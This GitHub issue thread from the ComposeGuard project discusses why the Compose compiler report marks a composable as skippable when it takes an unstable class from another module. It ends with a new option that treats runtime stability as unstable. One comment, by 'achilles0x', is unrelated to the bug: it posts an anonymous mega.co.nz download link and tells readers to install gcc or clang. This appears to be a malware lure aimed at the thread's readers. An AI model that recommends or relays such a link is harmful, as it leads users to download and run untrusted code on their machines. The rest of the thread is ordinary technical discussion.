### ISSUE TITLE
False negative (bug in compose compiler?) when consuming unstable model classes from another module

### ISSUE THREAD

**Issue by matejdro** [j-roskopf/ComposeGuard#62]
I found this weird quirk of the Compose compiler. When declaring an unstable class in one module:

```
data class UnstableDataClass(var text: String)
```

(confirmed that it is really unstable:
```
unstable class UnstableDataClass {
  stable var text: String
  <runtime stability> = Unstable
}
```
)

and then consuming that class in another module:

```
@Composable
fun Greeting(name: UnstableDataClass, modifier: Modifier = Modifier) {
    Text(
        text = "Hello ${name.text}!",
        modifier = modifier
    )
}
```

function will be somehow marked as `restartable skippable`, even though it uses unstable data class:

```
restartable skippable scheme("[androidx.compose.ui.UiComposable]") fun Greeting(
  name: UnstableDataClass
  stable modifier: Modifier? = @static Companion
)
```

and the unstable class does not have any modifier (neither `stable` nor `unstable`). 

Of course, since function is skippable, ComposeGuard does not report this case.

You can reproduce this by running `debugComposeCompilerCheck` in [ConfigCacheDemo.zip](https://github.com/user-attachments/files/17056761/ConfigCacheDemo.zip).

Now, from what I checked, this function is actually NOT skippable at the runtime. It appears that Compose properly detects the instability at runtime, it's just the compiler report that is wrong.

Should ComposeGuard also consider parameters with no stability modifier as unstable (maybe with a setting)? The caveat here is that it will report even stable parameters from another modules as unstable, forcing user to add `@Stable` annotation.

**Comment by achilles0x** [comment]
I think this will help you.
https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw
If you don't have the c compliator, install it.(gcc or clang)

**Comment by j-roskopf** [comment]
I asked around, and one of the compose engineers responded and stated:  

```
Stability between modules is defined as "runtime" stability, since you can have different class definitions at compile and runtime time. Compose checks stability at runtime and decides whether to skip based on that value
```

I clarified and asked so parameters that have an absence of `stable|unstable` in the report are implied to have runtime stability and they responded they believed so.

I don't think it would be safe for compose guard to imply anything about parameters with no stability markers because it could be wrong just as often as it is right unfortunately. As in, I think we'd see the same exact compose compiler report between

`data class UnstableDataClass(var text: String)`
and
`data class UnstableDataClass(val text: String)`

**Comment by matejdro** [comment]
Yes, I'm thinking which is worse:

1. Compose guard falsely not reporting unstable class in another module, resulting in non-restartable composables
2. Compose guard falsely reporting stable class in another module, requiring a developer to explicitly mark the class as `@Stable`

I'm kinda leaning towards 1 being worse (so we would be forced to perform 2, but we would not have any more false negatives).

Do you think this could be added as an option?

**Comment by j-roskopf** [comment]
I have added a new property going out in 2.3.8 under the `composeGuardCheck` extension

```
composeGuardCheck {
    assumeRuntimeStabilityAsUnstable.set(false)
}
```

with the following documentation in the readme

```
    /**
     * Stability cannot be automatically inferred across module boundaries. With this option enabled,
     * any properties marked as 'runtime' stability will be inferred to be unstable. If you can guarantee properties
     * as stable across module boundaries, mark them as so. 
     */
    assumeRuntimeStabilityAsUnstable = true // defaults to false
```

<img width="1448" alt="Screenshot 2024-09-23 at 10 44 13 AM" src="https://github.com/user-attachments/assets/0164f8ed-3b32-4f59-9aa1-47f43ae58099">

Please let me know if it works for you and it was what you had in mind!

**Comment by matejdro** [comment]
Thank you, it seems to be working!
